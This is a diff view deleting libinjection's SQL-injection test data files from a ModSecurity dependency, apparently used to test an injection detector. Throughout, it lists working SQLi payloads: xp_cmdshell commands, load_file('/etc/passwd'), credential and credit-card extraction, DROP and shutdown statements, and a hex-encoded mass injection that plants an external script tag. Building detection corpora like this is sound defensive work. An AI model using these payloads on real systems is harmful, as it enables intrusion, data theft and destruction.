1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
EXEC sp_add_job @job_name = 'TestJob';
EXECUTE sp_add_job @job_name = 'TestJob';
1;EXECUTE sp_add_job @job_name = 'TestJob';
1;print 'foo'; exec xp_cmdshell 'destroy';
# nested sub-selects
-1 - (select (1 - select (select 1))) union all select 2 --
-1 - (select 1) - union all select 2 --
(select 1) - 1 union all select 2 --
((select 1) - 1) + (select 1) union all select 2 --
(select (select (select 1))) union all select 2 --
(select (select (select 1))) union all select 2 --
(select ((select (select 1))) union all select 2 --
(select (select ((select 1))) union all select 2 --
(select ((select 1 - (select 1))) union all select 2 --
(select (select (((select 1))) union all select 2 --
(select ((select (select 1))) union all select 2 --
(select (((select (select 1))) union all select 2 --
(select (select (1 - select 1))) union all select 2 --
(select (select 1 - (select 1))) union all select 2 --
(select 1 - (select 1 - (select 1))) union all select 2 --
# moar unions
-1 union distinct select table_name from information_schema.tables
-1 union distinct all select table_name from information_schema.tables
-1 union all distinct select table_name from information_schema.tables
-1 union all select table_name from information_schema.tables
# more
if(1, -1, 2) union select table_name from information_schema.tables limit 1
if((1), -1, 2) union select table_name from information_schema.tables limit 1
if(1=2, -1, 2) union select table_name from information_schema.tables limit 1
true in(2, (select 2)) union select table_name from information_schema.tables limit 1
true in(2, 1) union select table_name from information_schema.tables limit 1
#
-1 union select current_user``union select table_name from information_schema.tables
if(1, 1, 2) union select 3
if(sin(1), 1, 2) union select 3
if(1, sin(1), 2) union select 3
if(1 - sin(1), 2) union select 3
if((1), 1, 2) union select 3
if(-(1), 1, 2) union select 3
#
1; if exists ( /* anything */
# these aren't SQL but close enough
union (select 1)--
union all (select 1)--
union all (select distinct 1)--
union (select 1,2,3,4,5)--
union (select -1,2,3,4,5)--
union (select -(1),2,3,4,5)--
union (select -sin(1),2,3,4,5)--
1;call p(@version, @a)
1;load data infile "foo"
1;load xml infile "foo"
1;load xml local infile "foo"
1;load xml low_priority infile "foo"
1;load xml concurrent infile "foo"
1; delete from foo
1; delete low_priority from foo
1; delete quick from foo
1; delete ignore from foo
1;do (1=1)
-0b01 for update union select table_name from information_schema.tables limit 1
binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables
binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables
1<binary 1>2 union select table_name from information_schema.tables limit 1
binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1
binary (false) union select table_name from information_schema.tables limit 1
1 - binary (false) union select table_name from information_schema.tables limit 1
1 - (binary (false)) union select table_name from information_schema.tables limit 1
binary binary 1 union select table_name from information_schema.tables
binary -1 union select table_name from information_schema.tables
binary -(1) union select table_name from information_schema.tables
binary (binary 1) union select table_name from information_schema.tables
binary (binary 1) union select table_name from information_schema.tables
# werid slash escaping in Older T-SQL databases
# http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
\1=\1AND\1=\1;
# more weird T-SQL weirdness
\%250=\-1AND\*1=\/1
# mysql
-1 procedure analyse() union select table_name from information_schema.tables limit 1
# HT @FluxReiners
(1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
@a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
# HT @LightOS
# issue here is how '1gfsdg..' is processed.
# MySQL parses it as a single word, other databases treat it as "1", "gfs..."
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
# HT @FluxReiners
(select 1 foo) union select load_file('foo');
#
# Anonymous from Research Institution of Telecom in Beijing, China
# commenting out since i have no idea how this could be a true SQL injection
#=1 union select admin,pass from admin limit 1
#=1 union select 1,2,3,4,5,6
# problems with type-casting, and nested type casting
#
# credit: Reto Ischi
#
's' || binary(1)# and n='foo"
1 - binary (1 - binary(1)) UNION SELECT 2 --
1 - binary (binary(1) -1) UNION SELECT 2 --
binary (1 - binary(1)) UNION SELECT 2 --
binary (binary(1) - 1) UNION SELECT 2 --
binary (binary(1)) UNION SELECT 2 --
#
# Padding using between operator
#
(1 between @version and "2") & 1 UNION SELECT 1
(1 between @version and @user) & 1 UNION SELECT 1
(1 between 1 and @version) & 1 UNION SELECT 1
(1 between '1' and @version) & 1 UNION SELECT 1
(1 between 1 and 2) & 1 UNION SELECT 1
(1 between '1' and '2') & 1 UNION SELECT 1
(1 between 1 and '2') & 1 UNION SELECT 1
(1 between '1' and 2) & 1 UNION SELECT 1
('1' between '1' and '2') & 1 UNION SELECT 1
(@version between '1' and '2') & 1 UNION SELECT 1
(@version between 1 and '2') & 1 UNION SELECT 1
#
# ANY and SOME subqueries
#
1 - ANY(SELECT 1,2)
ANY(SELECT 1) - 1 UNION ALL --
ANY(SELECT (1)) - 1 UNION ALL --
ANY((SELECT 1)) - 1 UNION ALL --
1 - ANY(SELECT 1) UNION ALL --
#
# embedded %A0 mysql
#
1%A0UNION%A0SELECT%A02--
1%00UNION%00SELECT%002--
#
# http://www.exploit-db.com/exploits/28854/
#
stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1
#
# Thanks to @rsalgado
# A degenerate MySQL ODBC case
#
-{``.``.id} union select table_name FROM information_schema.tables LIMIT 1

132
src/deps/src/ModSecurity/others/libinjection/data/sqli-mysql-implicit.txt
View File

@ -1,132 +0,0 @@
# mysql implicit conversions tests
A' AND 'B
A 'AND' B
'AND'
' AND '
A' && 'B
A '&&' B
'&&'
' && '
A' = 'B
A '=' B
'='
' = '
A' & 'B
A '&' B
'&'
' & '
A' | 'B
A '|' B
'|'
' | '
A' ^ 'B
A '^' B
'^'
' ^ '
A' DIV 'B
A 'DIV' B
'DIV'
' DIV '
A' / 'B
A '/' B
'/'
' / '
A' <=> 'B
A '<=>' B
'<=>'
' <=> '
A' >= 'B
A '>=' B
'>='
' >= '
A' > 'B
A '>' B
'>'
' > '
A' << 'B
A '<<' B
'<<'
' << '
A' <= 'B
A '<=' B
'<='
' <= '
A' < 'B
A '<' B
'<'
' < '
A' LIKE 'B
# common false positive
#A 'LIKE' B
#'LIKE'
#' LIKE '
A' - 'B
A '-' B
'-'
' - '
A' %25 'B
A '%25' B
'%25'
' %25 '
A' MOD 'B
A 'MOD' B
'MOD'
' MOD '
A' != 'B
A '!=' B
'!='
' != '
A' <> 'B
A '<>' B
'<>'
' <> '
A' NOT LIKE 'B
A 'NOT LIKE' B
'NOT LIKE'
' NOT LIKE '
A' NOT REGEXP 'B
A 'NOT REGEXP' B
'NOT REGEXP'
' NOT REGEXP '
A' OR 'B
A 'OR' B
'OR'
' OR '
A' || 'B
A '||' B
'||'
' || '
A' %2B 'B
A '%2B' B
'%2B'
' %2B '
A' REGEXP 'B
A 'REGEXP' B
'REGEXP'
' REGEXP '
A' >> 'B
A '>>' B
'>>'
' >> '
A' RLIKE 'B
A 'RLIKE' B
'RLIKE'
' RLIKE '
A' NOT RLIKE 'B
A 'NOT RLIKE' B
'NOT RLIKE'
' NOT RLIKE '
A' SOUNDS LIKE 'B
A 'SOUNDS LIKE' B
'SOUNDS LIKE'
' SOUNDS LIKE '
A' * 'B
A '*' B
'*'
' * '
A' XOR 'B
A 'XOR' B
'XOR'
' XOR '

275
src/deps/src/ModSecurity/others/libinjection/data/sqli-phpids.txt
View File

@ -1,275 +0,0 @@
#
# Various samples from PHPIDS
#
%22+OR+1%3D1%23
%3B+DROP+table+Users+--
admin%27--
SELECT+%2F%2A%2132302+1%2F0%2C+%2A%2F+1+FROM+tablename
10%3BDROP+members+--
SELECT+CHAR%280x66%29
SELECT+LOAD_FILE%280x633A5C626F6F742E696E69%29
EXEC%28%40stored_proc+%40param%29
chr%2811%29%7C%7Cchr%2812%29%7C%7Cchar%2813%29
1+or+name+like+%27%25%27
1+OR+%271%27%21%3D0
1+OR+ASCII%282%29+%3D+ASCII%282%29
1%27+OR+1%26%221
1%27+OR+%271%27+XOR+%270
1+OR%2B1%3D1
1+OR%2B%281%29%3D%281%29
aaa%27+or+%281%29%3D%281%29+%23%21asd
aaa%27+OR+%281%29+IS+NOT+NULL+%23%21asd
a%27+or+1%3D%271
asd%27+union+%28select+username%2Cpassword+from+admins%29+where+id%3D%271
1%27%3B+WAITFOR+TIME+%2717%3A48%3A00+%27+shutdown+--+-a
1%27%3B+anything%3A+goto+anything+--+-a
%27+%3D%2B+%27
asd%27+%3D-+%28-%27asd%27%29+--+-a
aa%22in%2B+%28%22aa%22%29+or+-1+%21%3D+%220
aa%22+%3D%2B+-+%220++
aa%27+LIKE+0+--+-a
aa%27+LIKE+md5%281%29+or+%271
aa%27+REGEXP-+md5%281%29+or+%271
aa%27+DIV%401+%3D+0+or+%271
aa%27+XOR-+column+%21%3D+-%270
union+select+password+from+users+where+1
str%27%3Dversion%28%29%0A%09%09%09%09%09%09UNION%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09SELECT+group_concat%28table_name%29%23%0A%09%09%09%09%09%09%23%23%0A%09%09%09%09%09%09%2F%2A%21FROM%2A%2F+information_schema.tables+WHERE+%271
asd%22or-1%3D%22-1
asd%22or%211%3D%22%211
asd%22or%21%281%29%3D%221
asd%22or%401%3D%22%401
asd%22or-1+XOR%220
asd%22+or+ascii%281%29%3D%2249
asd%22+or+md5%281%29%5E%221
asd%22+or+table.column%5E%221
asd%22+or+%40%40version%5E%220
asd%22+or+%40%40global.hot_cache.key_buffer_size%5E%221
1%22OR%21%22a
1%22OR%21%220
1%22OR-%221
1%22OR%40%221%22+IS+NULL+%231+%21+%28with+unfiltered+comment+by+tx+%3B%29
1%22OR%21%28false%29+%231+%21
1%22OR-%28true%29+%23a+%21
1%22+INTO+OUTFILE+%22C%3A%2Fwebserver%2Fwww%2Freadme.php
asd%27+or+md5%285%29%5E%271+
asd%27+or+column%5E%27-1+
asd%27+or+true+--+a
%5C%22asd%22+or+1%3D%221
a+1%27+or+if%28-1%3D-1%2Ctrue%2Cfalse%29%23%21
aa%5C%5C%22aaa%27+or+%271
%27+or+id%3D+1+having+1+%231+%21
%27+or+id%3D+2-1+having+1+%231+%21
aa%27or+null+is+null+%23%28
aa%27or+current_user%21%3D%27+1
aa%27or+BINARY+1%3D+%271
aa%27or+LOCALTIME%21%3D%270
aa%27like-%27aa
aa%27is%5CN%7C%21%27
%27is%5CN-%21%27
asd%27%7Ccolumn%26%26%271
asd%27%7Ccolumn%21%3D%27
aa%27or+column%3Dcolumn+--+%23aa
aa%27or+column%2Acolumn%21%3D%270
aa%27or+column+like+column+--+%23a
0%27%2Acolumn+is+%5CN+-+%271
1%27%2Acolumn+is+%5CN+or+%271
1%27%2A%40a+is+%5CN+-+%27
1%27%2A%40a+is+%5CN+or+%271
1%27+-1+or%2B1%3D+%27%2B1+
1%27+-1+-+column+or+%271+
1%27+-1+or+%271
+%281%29or%281%29%3D%281%29+
fo%22o%27or%271
%27+OR+UserID+IS+NOT+2
%27+OR+UserID+IS+NOT+NULL
%27+OR+UserID+%3E+1
%27++OR+UserID+RLIKE++%27.%2B%27+
%27OR+UserID+%3C%3E+2
1%27+union+%28select+password+from+users%29+--+-a
1%27+union+%28select%271%27%2C%272%27%2Cpassword+from+users%29+--+-a
1%27+union+all+%28select%271%27%2Cpassword+from+users%29+--+-a
aa%27%21%3D%271
aa%27%21%3D%7E%271
aa%27%3D%28%27aa%27%29%23%28
aa%27%7C%2B%271
aa%27%7C%21%27aa
aa%27%5E%21%27aa+
abc%27+%3D+%21%21%270
abc%27+%3D+%21%21%21%21%270
abc%27+%3D+%21%21%21%21%21%21%21%21%21%21%21%21%21%21%270
abc%27+%3D+%210+%3D+%21%21%270
abc%27+%3D+%210+%21%3D+%21%21%21%270
abc%27+%3D+%21%2B0+%21%3D+%21%270+
aa%27%3D%2B%271
%27%3Bif+1%3D1+drop+database+test--+-a
%27%3Bif+1%3D1+drop+table+users--+-a
%27%3Bif+1%3D1+shutdown--+-a
%27%3B+while+1%3D1+shutdown--+-a
%27%3B+begin+shutdown+end--+-a+
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D+%211+div+1%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%211+div+1%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%21%40%40version+div+%40%40version%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D%2B1+%3D+%21true+div+%40%40version%2B%27
foo%27div+count%28select%60pass%60from%28users%29where+mid%28pass%2C1%2C1%29rlike+lower%28conv%2810%2Cpi%28%29%2Api%28%29%2Cpi%28%29%2Api%28%29%29%29+%29-%270
1-%23canvas%0A++++++++++++++++++++++++%28SELECT+1%2A1+from%28information_schema.tables%29+group+by+table_name+having+-+left%28hex%28table_name%29%2Ctrue%29+%3D+-7%29
str%23%27+UNION+SELECT+group_concat%28table_name%29%0A++++++++++++++++++++++++FROM%60information_schema%60.tables
aa%27in+%280%29%23%28
aa%27%21%3Dascii%281%29%23%28
%27+or+SOUNDEX+%281%29+%21%3D+%270
aa%27RLIKE+BINARY+0%23%28
aa%27or+column%21%3D%271
aa%27or+column+DIV+0+%3D0+%23
aa%27or+column%2B%281%29%3D%271
aa%27or+0%21%3D%270
aa%27LIKE%270
aa%27or+id+%3D%27%5C%27
1%27%3Bdeclare+%40%23+int%3Bshutdown%3Bset+%40%23+%3D+%271
1%27%3Bdeclare+%40%40+int%3Bshutdown%3Bset+%40%40+%3D+%271
asd%27+or+column%26%26%271
asd%27+or+column%3D+%211+and%2B1%3D%271
aa%27%21%3Dascii%281%29+or-1%3D-%271
a%27IS+NOT+NULL+or%2B1%3D%2B%271
aa%27in%28%27aa%27%29+or-1%21%3D%270
aa%27+or+column%3D%2B%211+%231
aa%27+SOUNDS+like%2B%271
aa%27+REGEXP%2B%270
aa%27+like%2B%270
-1%27%3D-%27%2B1
%27%3D%2B%27
aa%27+or+stringcolumn%3D+%2B%211+%231+
aa%27+or+anycolumn+%5E+-%271
aa%27+or+intcolumn+%26%26+%271
asd%27+or+column%26%26%271
asd%27+or+column%3D+%211+and%2B1%3D%271
aa%27+or+column%3D%2B%211+%231
aa%27IS+NOT+NULL+or%2B1%5E%2B%270
aa%27IS+NOT+NULL+or+%2B1-1+xor%270
aa%27IS+NOT+NULL+or%2B2-1-1-1+%21%3D%270
aa%27%7C1%2B1%3D%282%29Or%281%29%3D%271
aa%27%7C3%21%3D%274
aa%27%7Cascii%281%29%2B1%21%3D%271
aa%27%7CLOCALTIME%2A0%21%3D%271+
asd%27+%7C1+%21%3D+%281%29%23aa
%27+is+99999+%3D+%27
%27+is+0.00000000000+%3D+%27
1%27%2Acolumn-0-%270
1%27-%40a+or%271
a%27-%40a%3D%40a+or%271
aa%27+%2A%40var+or+1+SOUNDS+LIKE+%281%29%7C%271
aa%27+%2A%40var+or+1+RLIKE+%281%29%7C%271+
a%27+or%7Ecolumn+like+%7E1%7C%271
%27%3C%7E%27
a%27-1.and+%271
aa%27%2F1+DIV+1+or%2B1%3D%2B%271+
aa%27%260%2B1%3D%27aa
aa%27+like%280%29+%2B+1--+-a+
aa%27%5E0%2B0%3D%270
aa%27%5E0%2B0%2B1-1%3D%280%29--+-a
aa%27%3C3%2B1+or%2B1%3D%2B%271
aa%27%251%2B0%3D%270
%27%2F1%2F1%3D%27
+aa%27%2F1+or+%271
+aa1%27+%2A+%40a+or+%271+%27%2F1+regexp+%270
+%27+%2F+1+%2F+1+%3D%27
+%27%2F1%3D%27
+aa%27%260%2B1+%3D+%27aa
+aa%27%26%2B1%3D%27aa
+aa%27%26%281%29%3D%27aa
+aa%27%5E0%2B0+%3D+%270
+aa%27%5E0%2B0%2B1-1+%3D+%280%29--+-a
+aa%27%5E%2B-3+or%271
+aa%27%5E0%21%3D%271
+aa%27%5E%280%29%3D%270
+aa%27+%3C+%283%29+or+%271
+aa%27+%3C%3C3+or%271
+aa%27-%2B%211+or+%271
+aa%27-%211+like%270
+aa%27+%25+1+or+%271
+aa%27+%2F+%271%27+%3C+%273
+aa%27+%2F+%2B1+%3C+%273
+aa%27+-+%2B+%21+2+%21%3D+%2B+-+%271
+aa%27+-+%2B+%21+1+or+%271
+aa%27+%2F+%2B1+like+%270
+%27+%2F+%2B+%281%29+%2F+%2B+%281%29+%3D%27
+aa%27+%26+%2B%280%29-%281%29%3D%27aa
+aa%27+%5E%2B+-%280%29+%2B+-%280%29+%3D+%270
+aa%27+%5E+%2B+-+3+or+%271
+aa%27+%5E+%2B0%21%3D%271
+aa%27+%3C+%2B3+or+%271
+aa%27+%25+%2B1+or+%271
aa%27or+column%2A0+like%270
aa%27or+column%2A0%3D%270
aa%27or+current_date%2A0
1%27%2Fcolumn+is+not+null+-+%27+
1%27%2Acolumn+is+not+%5CN+-+%27+
1%27%5Ecolumn+is+not+null+-+%27+
aa%27+is+0+or+%271
%27+or+MATCH+username+AGAINST+%28%27%2Badmin+-a%27+IN+BOOLEAN+MODE%29%3B+--+-a
%27+or+MATCH+username+AGAINST+%28%27a%2A+-%29+-%2B+%27+IN+BOOLEAN+MODE%29%3B+--+-a
1%27%2A%40a+or+%271
1%27%2Anull+or+%271
1%27%2AUTC_TIME+or+%271
1%27%2Anull+is+null+-+%27
1%27%2A%40a+is+null+-+%27
1%27%2A%40%40version%2A-0%2520%3D%2520%270
1%27%2Acurrent_date+rlike%270
aa%27%2Fcurrent_date+in+%280%29+--+-a
aa%27+%2F+current_date+regexp+%270
aa%27+%2F+current_date+%21%3D+%271
1%27+or+current_date%2A-0+rlike%271
0%27+%2F+current_date+XOR+%271
%27or+not+false+%23aa
1%27+%2A+id+-+%270
1%27+%2Aid-%270
asd%27%3B+shutdown%3B+
asd%27%3B+select+null%2Cpassword%2Cnull+from+users%3B+
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b+where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user+OPEN+tablecursor+
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b%0A++++++++++++++++++++++++where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user%0A++++++++++++++++++++++++OPEN+tablecursor+FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+WHILE%28%40a+%21%3D+null%29%0A++++++++++++++++++++++++%40query++%3D+null%2Bnull%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2Bnull%2B+%27+SET+id%3Dnull%2C%40b+%3D+%40payload%27%0A++++++++++++++++++++++++BEGIN+EXEC+sp_executesql+%40query%0A++++++++++++++++++++++++FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+END%0A++++++++++++++++++++++++CLOSE+tablecursor+DEALLOCATE+tablecursor%3B%0A++++++++++++++++++++++++and+some+text%2C+to+get+pass+the+centrifuge%3B+and+some+more+text.
%40query++%3D+null%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2B+%27+SET%5B++%27%2Bnull%2B%40b%2B+%27+%5D++%3D+%40payload%27
asd%27+union+distinct%28select+null%2Cpassword%2Cnull+from+users%29--a+
asd%27+union+distinct+%28+select+null%2Cpassword%2C%28null%29from+user+%29--+a+
# double encoded
## DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST%280x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%2520AS%2520CHAR%284000%29%29%3BEXEC%28%40S%29%3B
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
## asaa%27%3BSELECT%5Basd%5DFROM%5Basd%5D
## asd%27%3B+select+%5Bcolumn%5D+from+users+
0x31+union+select+%40%40version%2Cusername%2Cpassword+from+users+
1+order+by+if%281%3C2+%2Cuname%2Cuid%29+
1+order+by+ifnull%28null%2Cuserid%29+
2%27+between+1+and+3+or+0x61+like+%27a
4%27+MOD+2+like+%270
-1%27+%2FID+having+1%3C+1+and+1+like+1%2F%271+
2%27+%2F+0x62+or+0+like+binary+%270
0%27+between+2-1+and+4-1+or+1+sounds+like+binary+%271+
-1%27+union+%28%28select+%28select+user%29%2C%28select+password%29%2C1%2F1+from+mysql.user%29%29+order+by+%271+
-1%27+or+substring%28null%2Fnull%2C1%2Fnull%2C1%29+or+%271
1%27+and+1+%3D+hex%28null-1+or+1%29+or+1+%2F%27null+
AND+CONNECTION_ID%28%29%3DCONNECTION_ID%28%29
AND+ISNULL%281%2F0%29
MID%28%40%40hostname%2C+1%2C+1%29
CHARSET%28CURRENT_USER%28%29%29
DATABASE%28%29+LIKE+SCHEMA%28%29
COERCIBILITY%28USER%28%29%29
1%27+and+0x1abc+like+0x88+or+%270
%27-1-0+union+select+%28select+%60table_name%60+from+%60information_schema%60.tables+limit+1%29+and+%271
null%27%27null%27+find_in_set%28uname%2C+%27lightos%27+%29+and+%271
%28case-1+when+mid%28load_file%280x61616161%29%2C12%2C+1%2F+1%29like+0x61+then+1+else+0+end%29+
%27sounds+like%281%29+union%19%28select%191%2Cgroup_concat%28table_name%29%2C3%19from%19information_schema.%60tables%60%29%23%28
0%27+%271%27+like+%280%29+and+1+sounds+like+a+or+true%231
+0%27rlike%280%29and+1+rlike+%28%40a%29or+true+-+%27+0+
2a%27-1%5E+%27+0%27+and+%28select+mid%28user%2C1+%2F1%2C1%2F+1%29from%60mysql%60.user+limit+1%29+rlike+%27r
+A%27+sounds+like%28select+case%281%3D1%29when%271%27then%27A%27end%29+and+%271
1%27+and+0x31%3D%271+
1%27+and+0x05%3D%28select+0-+-mid%28version%28%29%2F-+-1%2C+1%2C1%29+as+%27a%27+from+dual%29+and+%271+
%27AND+1.-1LIKE.1+EXEC+xp_cmdshell+%27dir+
# skipping
#SELECT+1%2C2%2C0xEF%60
#SELECT+1%2C2%2C3%60abc%60%60
1%27AND%23%0A++++++++++++++++++++++++0%23%0A++++++++++++++++++++++++UNION%23%0A++++++++++++++++++++++++SELECT%40a%3A%3Dtable_name+FROM%23%0A++++++++++++++++++++++++information_schema.tables+LIMIT+1%23
1%27+and+0x43+%3D+%28select+all+mid%28table_name%2C+1%2C1%29as%27a%27from+%60information_schema%60.tables+limit+1%29+and+%271%0A++++++++++++++++++++++++%27AND+1.-1LIKE.1+INSERT+INTO+TMP_DB+EXEC+%22xp_cmdshell%22%27dir
1%27+AND+0x35+%3D+%28SELECT+%40phpids%3A%3DMID%28%40%40version+FROM+1+FOR+1%29+FROM+dual%29+and+%271+
null%27+or+%40%3A%3D%28select+all+user%27%27+from+mysql+.+user+limit+1%29+union%23%0A++++++++++++++++++++++++%23%0A++++++++++++++++++++++++select+%40%27
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+version%28%29%60
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+%28select+%60user%60+from%23%0A++++++++++++++++++++++++%23cc%0A++++++++++++++++++++++++mysql.user+limit+1%29%27

151
src/deps/src/ModSecurity/others/libinjection/data/sqli-rsalgado-bhusa2013.txt
View File

@ -1,151 +0,0 @@
#
# from
# Roberto Salgado
# SQLi Optimization and Obfuscation Techniques
# Black Hat USA 2013
#
#
# Slide 47 - Optimizing Queries MSSQL
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT table_name + ', ' FROM information_schema.tables FOR XML PATH('')
#
# Slide 48 - Optimizing Queries Oracle
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables
#
# Slide 49 - Optimizing Queries PSQL
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1
#
# Slide 50 - Optimizing Queries MSSQL
#
IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
#
# Slide 54 - Optimizing Queries - More Single Liners
# (
1 OR 1#"OR"'OR''='"="'OR''='
#
# Slide 55
#
1 OR 1#"OR"'OR''='"="'OR''='
#
# Slide 61
#
1!=0--+"!="'!='
#
# Slide 64 How to confuse an Admin
#
1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! 